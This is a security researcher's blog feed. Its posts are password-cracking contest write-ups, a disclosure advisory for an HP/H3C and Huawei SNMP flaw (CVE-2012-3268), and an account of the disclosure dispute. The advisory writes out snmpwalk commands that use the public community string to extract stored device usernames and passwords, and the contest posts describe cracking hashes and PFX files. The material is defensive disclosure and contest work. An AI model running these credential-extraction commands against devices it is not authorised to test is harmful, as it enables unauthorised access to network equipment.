tag:blogger.com,1999:blog-286873712024-02-19T17:30:29.458-08:00Superimposing Nothing NowhereThe internet is littered with wastes of space. This one is no different except that it is my waste of space.Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.comBlogger48125tag:blogger.com,1999:blog-28687371.post-23086255887636618132013-08-11T16:18:00.000-07:002013-08-11T16:18:27.202-07:00Crack Me If You Can 2013 - Street Challenge 3<div dir="ltr" style="text-align: left;" trbidi="on">
The Crack My If Can Street Challenge #3 was a fairly straight-forward "extract hashes and start cracking" problem. The hashes were Salted SHA1 inside a Berkeley DB. You could certainly have played with getting db_dump to work but it's just faster to use strings.<br />
<div>
<br /></div>
<script src="https://gist.github.com/grutz/6207325.js"></script>
<br />
<div>
<br />
<div>
<br /></div>
<div>
<br /></div>
</div>
</div>
<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-34973976169175372912013-08-11T14:09:00.001-07:002013-08-11T18:08:33.740-07:00Crack Me If You Can 2013 - Challenge 9: Part 1<div dir="ltr" style="text-align: left;" trbidi="on">
I again had some fun this year playing <a href="https://twitter.com/CrackMeIfYouCan" target="_blank">KoreLogic's</a> <complete id="goog_1449587281"><a href="http://contest-2013.korelogic.com/" target="_blank">Crack Me If You Can</a> password cracking contest at DEFCON 21. This year they separated teams between "Pros" and "Street" to make things a little more fair for individual users vs large groups. If you have any interest in password cracking then you can still download all the past 4 years of data and crack away! Huge thanks to the KoreLogic guys for putting on an excellent contest!</complete><br />
<complete><br /></complete>New to the contest this year, password hash files were grouped into companies with each company having their own password policy. The description of the policies were given as hints within the Challenge files which may have their own complex password requirements. It was truly inventive and really gave the contest a real-world feel to it.<br />
<br />
Of course my biggest problem is that by playing the game you don't get to really attend DEFCON so I didn't spend a lot of time cracking. You can tell my submissions were pretty much few and far between when I was back in my hotel room:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://contest-2013.korelogic.com/pix/graphs/Team-Crakka_Lakka_Ding_Dongs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://contest-2013.korelogic.com/pix/graphs/Team-Crakka_Lakka_Ding_Dongs.png" width="320" /></a></div>
Even so I came in third place mostly because I spent a little extra time on Challenge 9 because of the point value - 250,000 points!<br />
<br />
<a href="http://contest-2013.korelogic.com/stats_types.html">http://contest-2013.korelogic.com/stats_types.html</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUOnN7SlXn9mwTzOybhfDS2w5amrbpljBlDXeTPkTNbboF8H0YxESAF6tj9swyV1sMTPqCVjeXx0u09Q7SBgyTO-E5-SfaiwP6f4-1SkfV6s3qLQWsmORf33rpBsh9tTR7uIs/s1600/cmiyc-chall9-points.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="18" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUOnN7SlXn9mwTzOybhfDS2w5amrbpljBlDXeTPkTNbboF8H0YxESAF6tj9swyV1sMTPqCVjeXx0u09Q7SBgyTO-E5-SfaiwP6f4-1SkfV6s3qLQWsmORf33rpBsh9tTR7uIs/s400/cmiyc-chall9-points.png" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://contest-2013.korelogic.com/pix/graphs/figureStreet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://contest-2013.korelogic.com/pix/graphs/figureStreet.png" width="400" /></a></div>
As you can tell from the graph the scores for three of us (brad, I Cant Believe Its Not Butter, and me) jumped near the final few hours of the contest because of Challenge 9. Here's how I did it...<br />
<br />
<h2 style="text-align: left;">
<a name='more'></a>Cracking Street Challenge 9</h2>
<div>
Challenge9 was delivered as a compressed tar file. After opening it up you're given a README and a dd-created filesystem:</div>
<div>
<br /></div>
<div>
<div>
<script src="https://gist.github.com/grutz/6206702.js"></script></div>
</div>
<div>
<br /></div>
<div>
In order to mount the file you need to skip the first 65536 bytes (1 cylinder) to get to the partition data. With the filesystem mounted lets check out what's in there!</div>
<div>
<br /></div>
<div>
<script src="https://gist.github.com/grutz/6206714.js"></script></div>
<div>
<br /></div>
<div>
Hmm, mabel.pfx looks interesting and the secret documents certainly are something we want to read. They should give us some information about Company3's password policy. But we can't read them because they're encrypted. Lets break the PFX file open using John The Ripper + jumbo from <a href="https://github.com/magnumripper/JohnTheRipper">https://github.com/magnumripper/JohnTheRipper</a>, the "pfx2john" tool and run it through the RockYou wordlist:</div>
<div>
<br /></div>
<div>
<script src="https://gist.github.com/grutz/6206734.js"></script></div>
<div>
<br /></div>
<div>
Success! Only took about 4 hours thanks to a weak password! Now we just have to figure out how to pull the files off, import the PFX into Windows... etc. etc.. Windows.. pffft.</div>
</div>
<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-19328393793394305682012-11-14T09:46:00.000-08:002012-11-14T09:46:54.883-08:00Huawei Security Advisory released for SNMP<div dir="ltr" style="text-align: left;" trbidi="on">
For those keeping track, Huawei has released their advisory and work-around for affected devices.<br />
<br />
<a href="http://support.huawei.com/support/pages/news/NewsInfoAction.do?actionFlag=view&doc_id=IN0000054930&colID=ROOTENWEB%7CCO0000000170">http://support.huawei.com/support/pages/news/NewsInfoAction.do?actionFlag=view&doc_id=IN0000054930&colID=ROOTENWEB%7CCO0000000170</a><br />
<br />
<br /></div>
<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-47200282999012956352012-10-24T08:35:00.000-07:002012-10-24T08:41:22.505-07:00Crack All The Hashes!<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
Crack All The Hashes!</h2>
<div>
A few months back I was having a discussion with a co-worker about how to effectively crack a large PWDUMP file (thousands and thousands of users and hashes). I have a bunch of manual steps I use to churn through John the Ripper, oclHashcat and Rainbowcrack that I shared. Then I asked myself, "wtf, why not make a shell script instead?"</div>
<div>
<br /></div>
<div>
When mubix mentioned <a href="http://www.room362.com/blog/2012/10/24/lm2ntlm-with-john-the-ripper.html" target="_blank">lm2ntlm</a> patches to JtR for helping to crack from LANMAN to NTLM I remembered that I never fully wrote up anything here about the script. Soo... here's the script!<br />
<br />
Fork it, fix it, do whatever you want with it from <a href="https://gist.github.com/3416932">https://gist.github.com/3416932</a><br />
<br />
Execution is fairly straight forward. Hopefully I didn't make any glaring security holes when processing PWDUMP files. Use all your favorite precautions before or while running this.</div>
<div>
<br />
<script src="https://gist.github.com/3416932.js?file=crack-all-lm.sh"></script>
</div>
</div>
<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-42679165209616218882012-10-23T10:19:00.001-07:002012-10-26T07:38:00.581-07:00HP/H3C and Huawei SNMP Weak Access to Critical Data <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
</div>
<h2 style="text-align: left;">
HP/H3C and Huawei SNMP Weak Access to Critical Data</h2>
<h3 style="text-align: left;">
Overview</h3>
<div style="text-align: left;">
HP/H3C and Huawei networking equipment suffers from a serious weakness in regards to their handling of Systems Network Management Protocol (SNMP) requests for protected h3c-user.mib and hh3c-user.mib objects.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Identifiers</h3>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> US-CERT <a href="http://www.kb.cert.org/vuls/id/225404" target="_blank">VU#225404</a></li>
<li> <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3268" target="_blank">CVE-2012-3268</a></li>
</ul>
<br />
<div style="text-align: left;">
</div>
<h3 style="text-align: left;">
Vendor releases</h3>
<div style="text-align: left;">
<h4 style="text-align: left;">
HP/H3C:</h4>
<h4 style="text-align: left;">
<ul style="text-align: left;">
<li><a href="https://h20565.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685&ac.admitted=1350939600802.876444892.492883150">https://h20565.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685&ac.admitted=1350939600802.876444892.492883150</a></li>
</ul>
</h4>
</div>
<div style="text-align: left;">
<h4 style="text-align: left;">
Huawei EBG:</h4>
<ul style="text-align: left;">
<li>SN: <a href="http://support.huawei.com/enterprise/NewsReadAction.action?newType=0301&contentId=NEWS1000001069&idAbsPath=0301_10001&nameAbsPath=Services%2520News">http://support.huawei.com/enterprise/NewsReadAction.action?newType=0301&contentId=NEWS1000001069&idAbsPath=0301_10001&nameAbsPath=Services%2520News</a></li>
</ul>
<h4 style="text-align: left;">
Huawei CBG:</h4>
<ul style="text-align: left;">
<li>SN: <a href="http://support.huawei.com/support/pages/news/NewsInfoAction.do?doc_id=IN0000054625&colID=ROOTENWEB|CO0000000170&actionFlag=view">http://support.huawei.com/support/pages/news/NewsInfoAction.do?doc_id=IN0000054625&colID=ROOTENWEB|CO0000000170&actionFlag=view</a></li>
</ul>
</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Researcher</h3>
<div style="text-align: left;">
Kurt Grutzmacher</div>
<div style="text-align: left;">
grutz <at> jingojango dot net</div>
<div style="text-align: left;">
<a href="http://grutztopia.jingojango.net/">http://grutztopia.jingojango.net/</a></div>
<div style="text-align: left;">
twitter: <a href="https://twitter.com/grutz" target="_blank">@grutz</a></div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Details</h3>
<div style="text-align: left;">
Huawei/H3C have two OIDs, 'old' and 'new':</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> old: 1.3.6.1.4.1.2011.10</li>
<li> new: 1.3.6.1.4.1.25506</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Most devices support both formats.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The MIBs h3c-user.mib and hh3c-user.mib, for the purpose of this document, will be referred to as (h)h3c-user.mib. This MIB defines the internal table and objects to "Manage configuration and Monitor running state for userlog feature."</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This means there are some cool objects with data in this MIB penetration testers or malicious actors would want to get their dirty little hands on. Most objects are only accessible with the read/write community string.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In the revision history of (h)h3c-user.mib, version 2.0 modified the MAX-ACCESS from read-only to read-create the following objects within the (h)h3cUserInfoEntry sequence:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> (h)h3cUserName</li>
<li> (h)h3cUserPassword</li>
<li> (h)h3cAuthMode</li>
<li> (h)h3cUserLevel</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
The purpose of these objects are to provide the locally configured users to those with a valid SNMP community. After the change only those with the read-write community string should have access, however this was not the case and the code still retained the earlier access of read-only.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
So if you have the SNMP public community string then you have the ability to view these entries.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Why this is impactful</h3>
<div style="text-align: left;">
The (h)h3cUserPassword is presented in one of three formats as defined in the (h)h3cAuthMode object and mirrors how passwords are stored in the device configuration:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> 0 -- password simple, meaning cleartext</li>
<li> 7 -- password cipher, meaning ciphertext</li>
<li> 9 -- password sha-256, meaning one-way sha-256 hash</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
SHA-256 is a recent addition and is not supported on all devices yet.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
On top of this the (h)h3cUserLevel can be 0 to 3 where 0 is limited access and 3 is full access.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Globbing some users</h3>
<div style="text-align: left;">
You must have an SNMP read-only or read-write string and access to the</div>
<div style="text-align: left;">
SNMP port (udp/161) for this to work:</div>
<blockquote class="tr_bq" style="text-align: left;">
$ snmpwalk –c public –v 1 $IP 1.3.6.1.4.1.2011.10.2.12.1.1.1</blockquote>
<div style="text-align: left;">
or</div>
<blockquote class="tr_bq" style="text-align: left;">
$ snmpwalk –c public –v 1 $IP 1.3.6.1.4.1.25506.2.12.1.1.1</blockquote>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Weaponizing</h3>
<div style="text-align: left;">
Files relevant to this disclosure:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> hh3c-localuser-enum.rb - Metasploit auxiliary scanner module</li>
<li> snmp-h3c-login.nse - Nmap Scripting Engine module</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
These will soon be posted to <a href="https://github.com/grutz/h3c-pt-tools">https://github.com/grutz/h3c-pt-tools</a> and requested to be added to each tool.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Mitigation</h3>
<div style="text-align: left;">
By itself this is already bad but most users who do any of the following may already be protected:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li>Use complex SNMP community strings or disable SNMPv1</li>
<li>Have disabled the mib entries for (h)h3c-user</li>
<li>Block SNMP using access controls or firewalls</li>
<li>Do not define local users, use RADIUS or TACACS+</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
More specific routines can be found in the vendor's release.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Why this is a bigger problem</h3>
<div style="text-align: left;">
People make poor choices. They like to think their equipment won't rat them out so they use cleartext passwords on networking equipment.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The cipher is an interesting one because it's basically an unknown... What, you think the only thing I had to share at Toorcon was SNMP and some cleartext credentials?</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Timeline</h3>
<div style="text-align: left;">
<i>June-ish 2012</i>: Research begins after seeing something cool on a penetration test</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>August 6, 2012</i>: Contacted US-CERT to coordinate vendor disclosure, VU#225404</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>September 5, 2012</i>: No response from H3C, contacted US-CERT again</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>September 6, 2012</i>: H3C (through US-CERT) requests more time, I state intention to present findings at Toorcon (Oct 19/20, 2012) or disclose if talk not accepted.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>September 18, 2012</i>: Approved for Toorcon! Information goes up not long after on Toorcon website.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>September 18-October 16, 2012</i>: Build slides, work on tools, no contact with US-CERT or vendors.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>October 16, 2012</i>: HP contacts me directly asking that I not present this information at Toorcon</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>October 18, 2012</i>: Publicly state agreement to cancel the Toorcon talk</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>October 22, 2012</i>: HP discloses! What what? Why bother putting any pressure not to give the talk if you're gonna give everything out 2 days later?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>October 23, 2012</i>: So I publish.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
</div>
</div>
<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-11043887309630534402012-10-18T13:36:00.001-07:002012-10-18T13:43:00.359-07:00On HP/H3C and Schrödinger's Disclosure<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
Background and Timeline</h2>
Whew! The past two days have been a whirlwind of activity and I wanted to get this down before things got too crazy or out of hand.<br />
<br />
This weekend I had planned to be at Toorcon 14, my favorite security conference hands down, with a presentation entitled "<a href="http://sandiego.toorcon.org/index.php?option=com_content&task=view&id=141&Itemid=9" target="_blank">A CouNtry's Honerable n3twork deviCes</a>". The abstract:<br />
<blockquote class="tr_bq">
<span style="background-color: white; line-height: 18px;"><span style="font-family: inherit;">Thanks to FX you can now use buffer overflows on Huawei routers. Buffer overflows are cool but there are issues you have to overcome. What if there was another path which looked more like regular traffic? This talk will release details of research done in parallel to FX's against H3C/HP routers, switches, access points and firewalls. Some stats of affected Internet-accessible devices will be thrown about and updates released to Metasploit to help audit your own network. After this talk you just might be able to control a large part of the Internet in a very large CouNtry.</span></span></blockquote>
It's a culmination of research I've been doing since June, 2012 into H3C gear with stats I (and others) have collected. On August 6, not long after FX's DEFCON talk, I submitted what I had to US-CERT for them to coordinate with HP/H3C. Standard US-CERT <a href="http://www.cert.org/kb/vul_disclosure.html" target="_blank">disclosure policy is 45 days from vendor notification</a>. Unless the vendor asks and all agree to extend this.<br />
<br />
30 days later I had not heard back from US-CERT or HP/H3C so I requested an update. At this time HP/H3C requested more time at which I said "ok, you can have until Toorcon. I'm going to submit to talk and even if not selected I want to disclose this."<br />
<br />
All research and prep work for this talk was done as an individual researcher and not as part of any company. I had decided to go through US-CERT since I agree with their disclosure policy and felt this was something big and should be known and handled by them. They have a lot of experience and contacts to handle this. It's not that my employer's team isn't good, they're freaking awesome, I just didn't want to get them involved. Unfortunately.....<br />
<br />
<h3 style="text-align: left;">
Then Comes Tuesday..</h3>
I received a very cordial and apologetic voicemail and e-mail from the HP Software Security Response Team asking me not to present this Saturday. The vulnerabilities are apparently too big for them to be ready. I had clearly stated back in September my intention to provide mitigation techniques so that their customers would not be left in the dark after the presentation was done. I'm not a bad person, really.. Honest!<br />
<br />
While this was understood they still felt the information was too much of a risk and again requested I delay the talk until they could be ready.<br />
<br />
I'm guessing somebody woke up on Tuesday morning and went "Oh hell, is Toorcon this Saturday?" but you can speculate as you see fit. I can't stop you.<br />
<br />
Some dates were floated around. HP understands the urgency and also knows that ZDI, their own disclosure group, has a 6 month policy to "<a href="http://dvlabs.tippingpoint.com/blog/2010/08/03/zdi-disclosure-changes" target="_blank">disclose no matter what.</a>" So the information will come out, just not right now by me or US-CERT.<br />
<br />
Others strongly suggested to me that I agree with this delay. If you're familiar with the 7-layer OSI stack (similar to but not exactly like the 7-layer Taco Bell burrito) then you know there are 2 additional layers atop it. Politics and Money.<br />
<br />
Feel free to speculate as you see fit. I can't stop you.<br />
<br />
<h3 style="text-align: left;">
So Are You At Risk?</h3>
If you own and use H3C or Huawei equipment then of course you are. I have information of serious vulnerabilities and you don't. Nanny nanny boo boo. But I believe in Full and Responsible disclosure, which is why I went through US-CERT. It's just that this information has serious industry-wide implications that HP isn't ready to release.<br />
<br />
Can others figure out what I know? Certainly they could. Am I going to tell anyone or give hints? No, I cannot. There is this bag with an angry cat in it that wants to come out. Or it may not be a cat. It's Schrödinger's Disclosure! You just won't know until it's opened.<br />
<br />
This is what's tough about Full and Responsible Disclosure and why you should listen when dates and intentions are stated.<br />
<br />
If you own and use H3C or Huawei equipment then you already know you're at a serious risk thanks to FX's DEFCON talk. If you value your network and its data then you should already have taken steps to protect it. These protections will most likely keep you safe from me as well.<br />
<br />
However I know there are guys and girls out there that can find the same stuff I did. Please be respectful of me and HP by not talking about it if you do. Do feel free to talk to me and we'll commisurate together over our shared information.<br />
<br />
<h3 style="text-align: left;">
Contacting HP</h3>
<div>
If you have any questions in relation to this case, I encourage you to contact HP's PR contact <a href="mailto:samantha.singh@hp.com" target="_blank">Samantha Singh</a></div>
<div>
<br /></div>
<h3 style="text-align: left;">
Disclaimer</h3>
<div>
The content herein consists of my own personal opinions and not those of my employer.</div>
</div>
<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com2tag:blogger.com,1999:blog-28687371.post-76744606865147974802011-08-09T07:16:00.000-07:002011-08-09T07:16:03.854-07:00The contest is overKorelogic's <a href="http://contest.korelogic.com/">Crack Me If You Can</a> contest at Defcon is officially over. Team<a href="https://contest.korelogic.com/stats_EC952A038CB3ECB4.html"> Not Appearing At Defcon</a> scored decently given it was just me, two machines and not a lot of focused time.<br />
<br />
The top teams scores fully show that given enough resources and dedication today's password hashes can and will be broken. Congrats to the top four teams: <a href="https://contest.korelogic.com/stats_8D65BF65887D65A9.html">Hashcat</a>, <a href="https://contest.korelogic.com/stats_CCDE2FAB9599C0A6.html">InsidePro</a>, <a href="https://contest.korelogic.com/stats_7D47E99A316E29D7.html">john-users</a> and <a href="https://contest.korelogic.com/stats_889DCCAD7B08FD12.html">bindshell-dot-nl</a>. Reading your write-ups will be fun!<br />
<br />
I had a few goals I wanted to achieve while participating in the contest. I knew I wouldn't score high or often due to outside commitments. I mostly wanted to: <br />
<ul><li>Stretch out the environment we had built up for penetration tests</li>
<li>Try not to get sucked into trying for bigger scoring points and see how many overall hash types respond in the environment (failing sometimes to stick to this rule - damn competitive natures!)</li>
<li> Gain more experience with Hashcat's tools and closing some of my knowledge gaps with it</li>
<li>More real-world experience with using John The Ripper's modes.</li>
</ul>Yes it would be possible to build your own password list, encrypt it and such but there's something about having a third party source. You have no clue what was used so you're starting out completely blind! <br />
<ul></ul>Overall I felt the contest was a good representation of real-life password cracking experience with a few minor issues in my opinion:<br />
<ul><li>In a real world penetration test you typically receive bundles of hashes at a time. Usually a few Windows systems with local administrator and one or two potentially useful accounts. Then as the days progress you start owning larger and larger systems with more and more passwords (mssql, oracle, windows servers, etc). I'm not really sure how they could incorporate that into a 48 hour contest but it would be cool.</li>
<li>Individuals are severely outclassed by teams, but that's entirely ok. The contest was designed as a team-based system. Obviously those who had the resources to work together and develop their own tools have a huge step-up. The top three teams represented three different cracking toolsets.</li>
<li>The mssql/mssql05 debacle was annoying but glad it was cleared up. The problem with mssql hashes is that they crack in both formats so you really need to know your source. I had achieved a high number of mssql05 hashes but when they didn't point score I switched to mssql, which was incorrect. Quite a bit of wasted CPU time.</li>
</ul>Some of the things I liked about the contest:<br />
<ul><li> For those of us who are not hard-core shellcoders, this gave us something fun to play as part of Defcon instead of having our asses handed to us at CTF. The downside still is if you're at Defcon and you're in a contest you don't really get to enjoy Defcon. :)</li>
<li>The challenges were a nice touch - zip, pdf, rar and doc files with extra hashes in them to crack! I wasn't expecting them so I didn't spend too many cycles on them. Something to note for our environment...</li>
<li>A lot of hard work went into making this contest and from my vantage point it seemed to run pretty smoothly. Kudos to Korelogic!</li>
<li>Separating the hashes into their respective files was really helpful for writing scripts. Saved a bunch of time compared to the prior year's huge textfile of hashes. </li>
<li>The contest wasn't just about brute force strength, however having an arsenal of systems/people or an amazing GPU coder in your pocket helps. I heard that atom, the main coder for hashcat, wrote a GPU implementation of mscash2 in 8 hours. A serious leg up against everyone else given 16,000 points per DCC2 crack.</li>
<li>Wordlists helped but spotting patterns early on and adapting helped, as expected. A system I wasn't really able to exploit due to limited personal time.</li>
</ul>I look forward to the write-ups from the other teams. Big thanks to Solar Designer for making <a href="http://openwall.com/john/">John The Ripper</a> and the rest of the team that have been working to make <a href="http://openwall.info/wiki/john/patches">tremendous improvements</a> to it. It's been the tool-to-use for a number of years and continues to shine. Huge thanks to <a href="http://www.korelogic.com/">KoreLogic</a> for their second year of designing and working the contest.<br />
<br />
I look forward to next year's contest and the overall report!<br />
<br />
<ul></ul><ul></ul><div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-87096447058659333552011-08-06T00:32:00.000-07:002011-08-06T00:32:12.181-07:00Day 1 wrap-up, Crack me if you canUntil I finalise my thoughts more this will probably be the last update for the contest. It's pretty clear that one person with a few small resources can't crack as fast as an army of people that may or may not have a <a href="http://ob-security.info/?p=274">mega-setup</a> at their disposal.<br />
<br />
I don't think I scored too poorly given that I was an individual with two systems at my disposal. I've learned a lot and that will help in the long run.<br />
<br />
The contest this year includes some heavy point-setting password protected zip, rar and word documents. I'm sure they are some permutation of already cracked passwords, maybe I'll get to those later. There are too many things to do at once for this contest that you really need to put together a good team.<br />
<br />
My score so far?<br />
<br />
<span class="Apple-style-span" style="border-collapse: separate; color: black; font-family: 'Times New Roman'; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span class="Apple-style-span" style="font-family: 'Trebuchet MS',Arial; font-size: 12px; line-height: 15px;"></span></span><br />
<table border="1"><tbody>
<tr><td>80199</td><td>16094</td><td>EC952A038CB3ECB4</td><td>not appearing at defcon</td></tr>
</tbody></table><br />
<span class="Apple-style-span" style="border-collapse: separate; color: black; font-family: 'Times New Roman'; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span class="Apple-style-span" style="font-family: 'Trebuchet MS',Arial; font-size: 12px; line-height: 15px;"><b><br />
</b></span></span><br />
<table><tbody>
<tr></tr>
<tr><td>not appearing at defcon</td></tr>
</tbody></table><table border="1"><tbody>
<tr><th>points</th><th>cracks</th><th>value</th><th>hashname</th></tr>
<tr><td>5000</td><td>1</td><td>5000</td><td>bf</td></tr>
<tr><td>5000</td><td>5</td><td>1000</td><td>md5</td></tr>
<tr><td>200</td><td>1</td><td>200</td><td>bsdi</td></tr>
<tr><td>13662</td><td>759</td><td>18</td><td>raw-sha512</td></tr>
<tr><td>11640</td><td>776</td><td>15</td><td>mysql-sha1</td></tr>
<tr><td>7813</td><td>601</td><td>13</td><td>md5_gen(23)</td></tr>
<tr><td>6492</td><td>541</td><td>12</td><td>md5_gen(22)</td></tr>
<tr><td>8200</td><td>820</td><td>10</td><td>des</td></tr>
<tr><td>176</td><td>22</td><td>8</td><td>md5_gen(12)</td></tr>
<tr><td>280</td><td>40</td><td>7</td><td>oracle11</td></tr>
<tr><td>469</td><td>67</td><td>7</td><td>mssql</td></tr>
<tr><td>343</td><td>49</td><td>7</td><td>ssha</td></tr>
<tr><td>636</td><td>106</td><td>6</td><td>md5_gen(16)</td></tr>
<tr><td>7476</td><td>1246</td><td>6</td><td>raw-sha1</td></tr>
<tr><td>2628</td><td>876</td><td>3</td><td>phps</td></tr>
<tr><td>4221</td><td>4221</td><td>1</td><td>md5_gen(0)</td></tr>
<tr><td>5963</td><td>5963</td><td>1</td><td>nt</td></tr>
</tbody></table><br />
I really should have more single points up there but it's such a decision battle. Spend the cycles cracking some of the slower, higher point hashes or blast through the faster, lower point ones. Oh well, will pick up more cracking tomorrow if time permits, and it probably won't.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-56917713403740859012011-08-05T12:00:00.000-07:002011-08-05T12:00:51.970-07:00Holy crap, one against manyThe scores for this year's KoreLogic <a href="https://contest.korelogic.com/stats.html">Crack Me If You Can</a> contest are up and it appears that teams with multiple people and systems have a slight advantage....<br />
<br />
